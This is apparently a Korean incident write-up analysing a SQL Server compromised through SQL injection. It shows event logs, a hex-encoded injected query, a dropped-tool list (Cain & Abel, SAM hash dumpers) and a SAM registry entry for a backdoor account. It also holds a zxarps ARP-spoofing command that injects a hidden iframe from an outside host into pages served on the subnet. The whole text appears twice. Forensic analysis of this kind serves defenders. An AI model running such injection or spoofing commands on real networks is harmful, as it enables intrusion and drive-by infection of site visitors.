SQL Injection 해킹 관련 자료, zxarps.exe Cain & Abel 등
다음 관련 데이터 및 로그는 실제 Sql Injection 해킹된 서버에서, 해당 서브넷에서 Arp Spoofing 시도를 위한 일부 입니다. 이와 관련된 해킹 방어 대책은 인터넷에 수없이 공개되어 있으므로 참고만...^^
DDoS 공격사례, 기법 및 이를 위한 Arp Spoofing 등 기술문서
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=388
공개용 웹 방화벽 프로그램을 이용한 홈페이지 보안 - krcert
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=312
해킹, 악성코드등 보안 점검 자료 및 정보
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=310
Sql Injection 침해 흔적을 통한 보안점검
http://www.serverinfo.pe.kr/TipnTech.aspx?Seq=281
권한이 높은 DB 계정을 이용하는 웹사이트의 코드 허술함을 이용하는 Sql Injection 기법에 의해서, 해당 SQL Server 에 DTS 패키지가 등록되어 있는 상태
DTS패키지는, 데이터 원본(ODBC) 에 등록된 해당 프로바이더 연결을 이용하여 쿼리 데이터를 텍스트 파일 형식의 .asp 파일로 저장.
보통 주로 C:\ 루트나, 해당 웹사이트 루트 또는 특정 폴더 생성이나 이미 있는 폴더내에 생성하는 경우가 많으며 확장자는 주로 1.asp, 2.asp, 111.asp 등의 파일명 패턴을 가지고 있음.
'xpsqlbot.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_qv'을(를) 실행합니다.
'xpstar.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_ntsec_enumdomains'을(를) 실행합니다.
'xplog70.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_msver'을(를) 실행합니다.
이벤트 형식: 정보
이벤트 원본: MSSQLSERVER
이벤트 범주: (2)
이벤트 ID: 17055
설명:
8128 :
'odsole70.dll' 버전 '2000.80.2187'을(를) 사용하여 확장 저장 프로시저 'sp_OACreate'을(를) 실행합니다.
특정 OLE 개체의 인스턴트를 만들기 위해서 'sp_OACreate' 확장 저장프로시져를 호출
이벤트 형식: 오류
이벤트 원본: MSSQLSERVER
이벤트 범주: (6)
이벤트 ID: 17055
설명:
3041 :
BACKUP이 실패하여 'Select Count(*),CEILING(CAST(Count(*) AS FLOAT)/16) FROM xxx.xxxx A inner join xxxx.xxxx B on A.no = B.no Where B.Pt is not null And B.Category = '24';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x64003A005C0057005700
57005F0052004F004F0054005C007300730068006F00770071007500650065006E0
02E0063006F006D005C0031003200330
02E00610073007' 명령이 완료됩니다.
zxarps.exe -idx 0 -ip 120.xxx.xxx.xxx,120.xxx.xxx.xxx -port 80 -insert "<iframe src=http://mail.xxxxx.co.kr/help/i.htm width=0 height=0 ></iframe>"
1.bat
addins.zip
cmd.bat
WinPcap_4_1_beta.exe
zxarps.exe
해당 서버에는 Arp Spoofing 을 위해서 관련 툴을 다운로드. zxarps 툴은 해당 서브넷의 게이트웨이를 점유해서 서브넷내의 웹서버에서 클라이언트로 다운로드 되는 웹페이지 상단에 iframe 을 삽입함. 이전의 해당 웹서버의 index.asp 파일등을 변조하는 것보다 훨씬더 효과가 큼.
\system32
packet.dll
wanpacket.dll
wpcap.dll
\1025\sam\gethashes.exe
\1025\sam\getsyskey.exe
\1025\sam\saminside.exe
\sql server\mssql\bin
xp_nped.dll
시스템 폴더 및 SQL Server 폴더에 추가적인 해킹 및 Arp Spoofing 툴이 설치되는데, 중국어권 에서는 Arp Spoofing 툴로 매우 유명한 zxarps.exe 툴이 설치되어 있으며 해당 폴더에는 윈도우계정 생성 및 Arp Spoofing 를 위한 패킷 드라이버인 WinCap 이 설치됨.
C:\WINDOWS\system32\1025\Cain 디렉터리
2007-12-09 오전 12:07 <DIR> .
2007-12-09 오전 12:07 <DIR> ..
2007-12-09 오전 12:03 0 80211.LST
2007-10-09 오후 06:06 30,720 Abel.dll
2007-10-09 오후 06:14 66 Abel.dll.sig
2007-10-09 오후 06:13 27,648 Abel.exe
2007-10-09 오후 06:14 66 Abel.exe.sig
2007-10-09 오후 06:13 989,184 Cain.exe
2007-10-09 오후 06:14 66 Cain.exe.sig ......
주로 시스템의 계정 해킹에 이용되는 툴중에 매우 공개된 강력한 툴인 Cain & Abel 이 추가적으로 설치됨. 웹사이트: http://www.oxid.it
[서비스]에는 Remote Packetk 이 설치됨.
실행파일은 C:\WINDOWS\system32\Seveer.exe
C:\Documents and Settings\field\바탕 화면\xc02.exe
Remote Packetk 에 관련된 자료가 거의 없어서 정확이 어떤 역할을 하기 위해서 설치를 한것 인지는 모르겠으나, 원격 명령 또는 관리를 위해서 설치한 툴로 추정됨.
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,82,43,b8,5d,03,39,c8,01,00,00,00,00,00,00,00,\
00,06,95,e2,6f,66,a6,c7,01,00,00,00,00,00,00,00,00,7a,b5,49,46,9c,39,c8,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,69,00,01,00,00,00,00,\
00,00,00,00,00,00,00 ........
윈도우 계정 생성을 위한 레지스트리 등록하며, 계정명은 주로 Field 임.
DTS패키지는, 데이터 원본(ODBC) 에 등록된 해당 프로바이더 연결을 이용하여 쿼리 데이터를 텍스트 파일 형식의 .asp 파일로 저장.
보통 주로 C:\ 루트나, 해당 웹사이트 루트 또는 특정 폴더 생성이나 이미 있는 폴더내에 생성하는 경우가 많으며 확장자는 주로 1.asp, 2.asp, 111.asp 등의 파일명 패턴을 가지고 있음.
'xpsqlbot.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_qv'을(를) 실행합니다.
'xpstar.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_ntsec_enumdomains'을(를) 실행합니다.
'xplog70.dll' 버전 '2000.80.2039'을(를) 사용하여 확장 저장 프로시저 'xp_msver'을(를) 실행합니다.
이벤트 형식: 정보
이벤트 원본: MSSQLSERVER
이벤트 범주: (2)
이벤트 ID: 17055
설명:
8128 :
'odsole70.dll' 버전 '2000.80.2187'을(를) 사용하여 확장 저장 프로시저 'sp_OACreate'을(를) 실행합니다.
특정 OLE 개체의 인스턴트를 만들기 위해서 'sp_OACreate' 확장 저장프로시져를 호출
이벤트 형식: 오류
이벤트 원본: MSSQLSERVER
이벤트 범주: (6)
이벤트 ID: 17055
설명:
3041 :
BACKUP이 실패하여 'Select Count(*),CEILING(CAST(Count(*) AS FLOAT)/16) FROM xxx.xxxx A inner join xxxx.xxxx B on A.no = B.no Where B.Pt is not null And B.Category = '24';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x64003A005C0057005700
57005F0052004F004F0054005C007300730068006F00770071007500650065006E0
02E0063006F006D005C0031003200330
02E00610073007' 명령이 완료됩니다.
zxarps.exe -idx 0 -ip 120.xxx.xxx.xxx,120.xxx.xxx.xxx -port 80 -insert "<iframe src=http://mail.xxxxx.co.kr/help/i.htm width=0 height=0 ></iframe>"
1.bat
addins.zip
cmd.bat
WinPcap_4_1_beta.exe
zxarps.exe
해당 서버에는 Arp Spoofing 을 위해서 관련 툴을 다운로드. zxarps 툴은 해당 서브넷의 게이트웨이를 점유해서 서브넷내의 웹서버에서 클라이언트로 다운로드 되는 웹페이지 상단에 iframe 을 삽입함. 이전의 해당 웹서버의 index.asp 파일등을 변조하는 것보다 훨씬더 효과가 큼.
\system32
packet.dll
wanpacket.dll
wpcap.dll
\1025\sam\gethashes.exe
\1025\sam\getsyskey.exe
\1025\sam\saminside.exe
\sql server\mssql\bin
xp_nped.dll
시스템 폴더 및 SQL Server 폴더에 추가적인 해킹 및 Arp Spoofing 툴이 설치되는데, 중국어권 에서는 Arp Spoofing 툴로 매우 유명한 zxarps.exe 툴이 설치되어 있으며 해당 폴더에는 윈도우계정 생성 및 Arp Spoofing 를 위한 패킷 드라이버인 WinCap 이 설치됨.
C:\WINDOWS\system32\1025\Cain 디렉터리
2007-12-09 오전 12:07 <DIR> .
2007-12-09 오전 12:07 <DIR> ..
2007-12-09 오전 12:03 0 80211.LST
2007-10-09 오후 06:06 30,720 Abel.dll
2007-10-09 오후 06:14 66 Abel.dll.sig
2007-10-09 오후 06:13 27,648 Abel.exe
2007-10-09 오후 06:14 66 Abel.exe.sig
2007-10-09 오후 06:13 989,184 Cain.exe
2007-10-09 오후 06:14 66 Cain.exe.sig ......
주로 시스템의 계정 해킹에 이용되는 툴중에 매우 공개된 강력한 툴인 Cain & Abel 이 추가적으로 설치됨. 웹사이트: http://www.oxid.it
[서비스]에는 Remote Packetk 이 설치됨.
실행파일은 C:\WINDOWS\system32\Seveer.exe
C:\Documents and Settings\field\바탕 화면\xc02.exe
Remote Packetk 에 관련된 자료가 거의 없어서 정확이 어떤 역할을 하기 위해서 설치를 한것 인지는 모르겠으나, 원격 명령 또는 관리를 위해서 설치한 툴로 추정됨.
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,82,43,b8,5d,03,39,c8,01,00,00,00,00,00,00,00,\
00,06,95,e2,6f,66,a6,c7,01,00,00,00,00,00,00,00,00,7a,b5,49,46,9c,39,c8,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,69,00,01,00,00,00,00,\
00,00,00,00,00,00,00 ........
윈도우 계정 생성을 위한 레지스트리 등록하며, 계정명은 주로 Field 임.